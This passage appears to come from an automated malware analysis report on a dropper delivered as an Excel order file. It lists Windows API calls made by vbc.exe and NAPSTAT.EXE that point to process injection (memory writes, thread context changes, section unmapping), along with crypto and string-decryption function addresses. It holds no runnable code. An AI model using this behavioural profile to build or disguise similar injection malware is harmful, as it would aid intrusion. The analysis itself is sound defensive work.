Source: C:\Users\Public\vbc.exe Code function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess, 4_2_0031078C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315435 NtWriteVirtualMemory, 4_2_00315435
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316039 NtResumeThread, 4_2_00316039
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316015 NtResumeThread, 4_2_00316015
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312455 NtWriteVirtualMemory, 4_2_00312455
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104B2 NtSetInformationThread, 4_2_003104B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_003124BD NtWriteVirtualMemory, 4_2_003124BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316089 NtResumeThread, 4_2_00316089
Source: C:\Users\Public\vbc.exe Code function: 4_2_003160D1 NtResumeThread, 4_2_003160D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104CD NtSetInformationThread, 4_2_003104CD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312531 NtWriteVirtualMemory, 4_2_00312531
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310537 NtSetInformationThread, 4_2_00310537
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310516 NtSetInformationThread, 4_2_00310516
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316106 NtResumeThread, 4_2_00316106
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031059D NtSetInformationThread, 4_2_0031059D
Source: C:\Users\Public\vbc.exe Code function: 4_2_003161ED NtResumeThread, 4_2_003161ED
Source: C:\Users\Public\vbc.exe Code function: 4_2_003105D9 NtSetInformationThread, 4_2_003105D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316239 NtResumeThread, 4_2_00316239
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031260D NtWriteVirtualMemory, 4_2_0031260D
Source: C:\Users\Public\vbc.exe Code function: 4_2_003162C5 NtResumeThread, 4_2_003162C5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316325 NtResumeThread, 4_2_00316325
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312705 NtWriteVirtualMemory, 4_2_00312705
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310F7D NtWriteVirtualMemory, 4_2_00310F7D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031276A NtWriteVirtualMemory, 4_2_0031276A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315FE5 NtResumeThread, 4_2_00315FE5
Source: C:\Users\Public\vbc.exe Code function: 4_2_003147EF NtSetInformationThread, 4_2_003147EF
Source: C:\Users\Public\vbc.exe Code function: 4_2_003123D5 NtWriteVirtualMemory, 4_2_003123D5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315FC1 NtResumeThread, 4_2_00315FC1
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B EnumWindows,NtSetInformationThread, 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA, 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315A6C NtProtectVirtualMemory, 4_2_00315A6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA, 4_2_003106B1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315336 NtSetInformationThread,LoadLibraryA, 4_2_00315336
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031232A NtWriteVirtualMemory, 4_2_0031232A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315F9F NtResumeThread, 4_2_00315F9F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess, 4_2_0031078C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315435 NtWriteVirtualMemory, 4_2_00315435
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316039 NtResumeThread, 4_2_00316039
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316015 NtResumeThread, 4_2_00316015
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312455 NtWriteVirtualMemory, 4_2_00312455
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104B2 NtSetInformationThread, 4_2_003104B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_003124BD NtWriteVirtualMemory, 4_2_003124BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316089 NtResumeThread, 4_2_00316089
Source: C:\Users\Public\vbc.exe Code function: 4_2_003160D1 NtResumeThread, 4_2_003160D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104CD NtSetInformationThread, 4_2_003104CD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312531 NtWriteVirtualMemory, 4_2_00312531
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310537 NtSetInformationThread, 4_2_00310537
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310516 NtSetInformationThread, 4_2_00310516
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316106 NtResumeThread, 4_2_00316106
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031059D NtSetInformationThread, 4_2_0031059D
Source: C:\Users\Public\vbc.exe Code function: 4_2_003161ED NtResumeThread, 4_2_003161ED
Source: C:\Users\Public\vbc.exe Code function: 4_2_003105D9 NtSetInformationThread, 4_2_003105D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316239 NtResumeThread, 4_2_00316239
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031260D NtWriteVirtualMemory, 4_2_0031260D
Source: C:\Users\Public\vbc.exe Code function: 4_2_003162C5 NtResumeThread, 4_2_003162C5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316325 NtResumeThread, 4_2_00316325
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312705 NtWriteVirtualMemory, 4_2_00312705
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310F7D NtWriteVirtualMemory, 4_2_00310F7D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031276A NtWriteVirtualMemory, 4_2_0031276A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315FE5 NtResumeThread, 4_2_00315FE5
Source: C:\Users\Public\vbc.exe Code function: 4_2_003147EF NtSetInformationThread, 4_2_003147EF
Source: C:\Users\Public\vbc.exe Code function: 4_2_003123D5 NtWriteVirtualMemory, 4_2_003123D5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315FC1 NtResumeThread, 4_2_00315FC1
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_1E98FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_1E98FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FFB4 NtCreateSection,LdrInitializeThunk, 5_2_1E98FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_1E98FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_1E98FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FD8C NtDelayExecution,LdrInitializeThunk, 5_2_1E98FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_1E98FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_1E98FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_1E98FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_1E98FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_1E98FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F900 NtReadFile,LdrInitializeThunk, 5_2_1E98F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9900C4 NtCreateFile,LdrInitializeThunk, 5_2_1E9900C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_1E990048
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk, 5_2_1E990078
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FE24 NtWriteVirtualMemory, 5_2_1E98FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FFFC NtCreateProcessEx, 5_2_1E98FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FF34 NtQueueApcThread, 5_2_1E98FF34
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC30 NtOpenProcess, 5_2_1E98FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC48 NtSetInformationFile, 5_2_1E98FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990C40 NtGetContextThread, 5_2_1E990C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991D80 NtSuspendThread, 5_2_1E991D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FD5C NtEnumerateKey, 5_2_1E98FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FAB8 NtQueryValueKey, 5_2_1E98FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FA20 NtQueryInformationFile, 5_2_1E98FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FA50 NtEnumerateValueKey, 5_2_1E98FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FBE8 NtQueryVirtualMemory, 5_2_1E98FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FB50 NtCreateKey, 5_2_1E98FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F8CC NtWaitForSingleObject, 5_2_1E98F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F9F0 NtClose, 5_2_1E98F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F938 NtWriteFile, 5_2_1E98F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991930 NtSetContextThread, 5_2_1E991930
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9907AC NtCreateMutant, 5_2_1E9907AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9910D0 NtOpenProcessToken, 5_2_1E9910D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990060 NtQuerySection, 5_2_1E990060
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9901D4 NtSetValueKey, 5_2_1E9901D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99010C NtOpenDirectoryObject, 5_2_1E99010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991148 NtOpenThread, 5_2_1E991148
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5A6C NtProtectVirtualMemory, 5_2_001B5A6C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B00C4 NtCreateFile,LdrInitializeThunk, 9_2_020B00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B07AC NtCreateMutant,LdrInitializeThunk, 9_2_020B07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_020AFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_020AFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_020AFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF900 NtReadFile,LdrInitializeThunk, 9_2_020AF900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF9F0 NtClose,LdrInitializeThunk, 9_2_020AF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_020AFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_020AFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0048 NtProtectVirtualMemory, 9_2_020B0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0060 NtQuerySection, 9_2_020B0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0078 NtResumeThread, 9_2_020B0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B10D0 NtOpenProcessToken, 9_2_020B10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B010C NtOpenDirectoryObject, 9_2_020B010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1148 NtOpenThread, 9_2_020B1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B01D4 NtSetValueKey, 9_2_020B01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFA20 NtQueryInformationFile, 9_2_020AFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFA50 NtEnumerateValueKey, 9_2_020AFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFAB8 NtQueryValueKey, 9_2_020AFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFB50 NtCreateKey, 9_2_020AFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFBB8 NtQueryInformationToken, 9_2_020AFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFBE8 NtQueryVirtualMemory, 9_2_020AFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF8CC NtWaitForSingleObject, 9_2_020AF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF938 NtWriteFile, 9_2_020AF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1930 NtSetContextThread, 9_2_020B1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFE24 NtWriteVirtualMemory, 9_2_020AFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFEA0 NtReadVirtualMemory, 9_2_020AFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFF34 NtQueueApcThread, 9_2_020AFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFFB4 NtCreateSection, 9_2_020AFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFFFC NtCreateProcessEx, 9_2_020AFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC30 NtOpenProcess, 9_2_020AFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC48 NtSetInformationFile, 9_2_020AFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0C40 NtGetContextThread, 9_2_020B0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC60 NtMapViewOfSection, 9_2_020AFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC90 NtUnmapViewOfSection, 9_2_020AFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFD5C NtEnumerateKey, 9_2_020AFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFD8C NtDelayExecution, 9_2_020AFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1D80 NtSuspendThread, 9_2_020B1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099D50 NtCreateFile, 9_2_00099D50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099E00 NtReadFile, 9_2_00099E00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099E80 NtClose, 9_2_00099E80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099F30 NtAllocateVirtualMemory, 9_2_00099F30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099D4B NtCreateFile, 9_2_00099D4B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099DA4 NtCreateFile, 9_2_00099DA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099DFE NtReadFile, 9_2_00099DFE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099E7A NtClose, 9_2_00099E7A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099F2B NtAllocateVirtualMemory, 9_2_00099F2B
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403858 4_2_00403858
Source: C:\Users\Public\vbc.exe Code function: 4_2_00401218 4_2_00401218
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403C2E 4_2_00403C2E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403A59 4_2_00403A59
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403AEE 4_2_00403AEE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403A87 4_2_00403A87
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403B49 4_2_00403B49
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403B13 4_2_00403B13
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403858 4_2_00403858
Source: C:\Users\Public\vbc.exe Code function: 4_2_00401218 4_2_00401218
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403C2E 4_2_00403C2E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403A59 4_2_00403A59
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403AEE 4_2_00403AEE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403A87 4_2_00403A87
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403B49 4_2_00403B49
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403B13 4_2_00403B13
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9BEE4C 5_2_1E9BEE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B0F3F 5_2_1E9B0F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA3FDDD 5_2_1EA3FDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9D0D3B 5_2_1E9D0D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9ACD5B 5_2_1E9ACD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA53A83 5_2_1EA53A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA4CBA4 5_2_1EA4CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99FBD7 5_2_1E99FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA2DBDA 5_2_1EA2DBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9C7B00 5_2_1E9C7B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA3F8EE 5_2_1EA3F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9AC85C 5_2_1E9AC85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9C286D 5_2_1E9C286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A29B2 5_2_1E9A29B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA4098E 5_2_1EA4098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B69FE 5_2_1E9B69FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA25955 5_2_1EA25955
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A4680 5_2_1E9A4680
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9AE6C1 5_2_1E9AE6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA42622 5_2_1EA42622
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9AC7BC 5_2_1E9AC7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA2579A 5_2_1EA2579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B1489 5_2_1E9B1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9D5485 5_2_1E9D5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9BC5F0 5_2_1E9BC5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A351F 5_2_1E9A351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99E2E9 5_2_1E99E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA41238 5_2_1EA41238
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9C63DB 5_2_1E9C63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99F3CF 5_2_1E99F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A2305 5_2_1E9A2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A7353 5_2_1E9A7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9EA37B 5_2_1E9EA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99E0C6 5_2_1E99E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B905A 5_2_1E9B905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A3040 5_2_1E9A3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02161238 9_2_02161238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BE2E9 9_2_020BE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C2305 9_2_020C2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C7353 9_2_020C7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0210A37B 9_2_0210A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_021663BF 9_2_021663BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BF3CF 9_2_020BF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020E63DB 9_2_020E63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020ED005 9_2_020ED005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C3040 9_2_020C3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D905A 9_2_020D905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BE0C6 9_2_020BE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0210A634 9_2_0210A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02162622 9_2_02162622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C4680 9_2_020C4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CE6C1 9_2_020CE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214579A 9_2_0214579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CC7BC 9_2_020CC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F57C3 9_2_020F57C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214443E 9_2_0214443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020FD47D 9_2_020FD47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D1489 9_2_020D1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F5485 9_2_020F5485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C351F 9_2_020C351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02106540 9_2_02106540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020DC5F0 9_2_020DC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02173A83 9_2_02173A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020E7B00 9_2_020E7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0216CBA4 9_2_0216CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214DBDA 9_2_0214DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BFBD7 9_2_020BFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CC85C 9_2_020CC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020E286D 9_2_020E286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0215F8EE 9_2_0215F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02145955 9_2_02145955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214394B 9_2_0214394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0216098E 9_2_0216098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C29B2 9_2_020C29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D69FE 9_2_020D69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F2E2F 9_2_020F2E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020DEE4C 9_2_020DEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D0F3F 9_2_020D0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020EDF7C 9_2_020EDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0215CFB1 9_2_0215CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02132FDC 9_2_02132FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F0D3B 9_2_020F0D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CCD5B 9_2_020CCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0215FDDD 9_2_0215FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009E5ED 9_2_0009E5ED
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009D781 9_2_0009D781
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00089E2C 9_2_00089E2C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00089E30 9_2_00089E30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009DE55 9_2_0009DE55
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009DF6E 9_2_0009DF6E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CF93 9_2_0009CF93
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082FB0 9_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Unique food order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Unique food order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 1E99E2A8 appears 34 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1EA0F970 appears 77 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E9E373B appears 237 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E9E3F92 appears 99 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E99DF5C appears 100 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E99E2A8 appears 34 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1EA0F970 appears 77 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E9E373B appears 237 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E9E3F92 appears 99 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E99DF5C appears 100 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020BE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0212F970 appears 84 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 02103F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0210373B appears 245 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020BDF5C appears 119 times
PE file contains strange resources
Source: svchost[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
